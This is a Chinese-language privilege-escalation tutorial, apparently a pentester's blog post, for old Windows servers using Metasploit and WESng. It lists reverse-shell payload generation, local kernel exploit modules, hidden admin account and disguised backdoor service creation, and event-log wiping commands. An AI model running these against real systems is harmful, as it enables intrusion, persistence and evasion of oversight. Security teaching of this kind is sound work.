从IIS用户到System:手把手教你用MSF和WESng搞定老旧Windows服务器提权
从IIS低权限到System:老旧Windows服务器提权实战指南
老旧Windows服务器在企业内网中依然常见,它们往往运行着关键业务系统,却因为各种原因未能及时更新补丁。作为一名安全工程师,我曾在一次渗透测试中遇到一台Windows Server 2003服务器,通过IIS漏洞获得了webshell,但权限仅限于IIS应用程序池账户。本文将分享如何在这种场景下,通过系统化方法实现权限提升。
1. 环境准备与初始访问
在开始提权操作前,需要做好充分的准备工作。攻击机通常选择Kali Linux,因为它预装了Metasploit框架等渗透测试工具。对于老旧Windows服务器,以下几个关键点需要特别注意:
- 系统版本识别:通过
systeminfo命令获取详细的系统版本和已安装补丁 - 网络环境确认:确保攻击机与目标服务器之间的网络连通性
- 权限初步评估:使用
whoami和whoami /priv命令确认当前权限级别
提示:老旧系统往往存在共享目录写入权限问题,C:\RECYCLER\、C:\Windows\Temp\等目录通常是可写的理想位置。
生成Meterpreter反向TCP载荷的典型命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<监听端口> -f exe -o /var/www/html/shell.exe2. 自动化提权尝试与失败分析
获得初始shell后,第一反应往往是尝试自动化提权。Metasploit提供了getsystem命令,它尝试多种技术来提升权限:
- 命名管道模拟(Named Pipe Impersonation)
- 命名管道DLL注入(Named Pipe DLL Injection)
- 令牌复制(Token Duplication)
- 服务权限提升(Service Permissions)
常见失败原因分析:
| 失败现象 | 可能原因 | 解决方案 |
|---|---|---|
| ERROR: Operation failed: Access is denied | UAC限制 | 尝试绕过UAC或使用其他提权模块 |
| No technique worked | 系统加固 | 手动检查补丁情况 |
| Session is not elevated | 会话问题 | 迁移到稳定进程 |
当getsystem失败时,需要转向手动提权路径。这时应该:
# 查看当前权限 getuid # 检查可用权限 getprivs # 列出进程寻找注入目标 ps3. 补丁分析与漏洞匹配
对于老旧Windows系统,补丁缺失是最常见的提权突破口。WESng(Windows Exploit Suggester - Next Generation)是一个强大的工具,它能根据systeminfo输出分析缺失的补丁。
WESng使用流程:
- 在目标机器上执行:
systeminfo > systeminfo.txt - 将结果文件传输到攻击机
- 运行WESng分析:
python wes.py systeminfo.txt -m --os "Windows Server 2003"
WESng输出的关键信息包括:
- 缺失的KB编号:对应特定的安全补丁
- CVE编号:漏洞的唯一标识
- 可利用性评估:是否已有公开的利用代码
高危漏洞优先级排序:
- 内核级漏洞(如ms14_058)
- 服务漏洞(如ms15_051)
- 本地提权漏洞(如ms16_032)
- 第三方软件漏洞
4. 手动提权模块选择与利用
根据WESng的分析结果,可以有针对性地选择Metasploit中的提权模块。以下是针对不同漏洞的典型利用流程:
4.1 MS14-058内核提权
# 搜索相关模块 search ms14_058 # 使用提权模块 use exploit/windows/local/ms14_058_track_popup_menu # 设置会话 set SESSION <session_id> # 执行攻击 exploit4.2 MS16-032服务提权
use exploit/windows/local/ms16_032_secondary_logon_handle set SESSION <session_id> set LHOST <攻击机IP> exploit4.3 其他常见提权技术
- AlwaysInstallElevated:检查注册表中是否启用了非特权安装
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated - 服务配置不当:查找可写服务路径
accesschk.exe -uwcqv "Authenticated Users" * - 计划任务:检查可执行文件权限
schtasks /query /fo LIST /v
5. 权限维持与清理痕迹
成功提权后,需要采取措施维持访问权限并清理痕迹:
持久化技术:
- 创建隐藏账户:
net user /add stealthuser complexpassword$ net localgroup administrators stealthuser /add - 安装后门服务:
sc create "WindowsUpdate" binPath= "cmd.exe /k C:\backdoor.exe" start= auto
痕迹清理建议:
- 删除上传的工具和payload
- 清理事件日志:
wevtutil cl System wevtutil cl Security wevtutil cl Application - 恢复修改的注册表项
在实际渗透测试中,我曾遇到一台Windows Server 2008 R2系统,通过分析发现缺失MS15-051补丁,使用对应的提权模块成功获得SYSTEM权限。关键是要有耐心,逐步排查每个可能的突破口。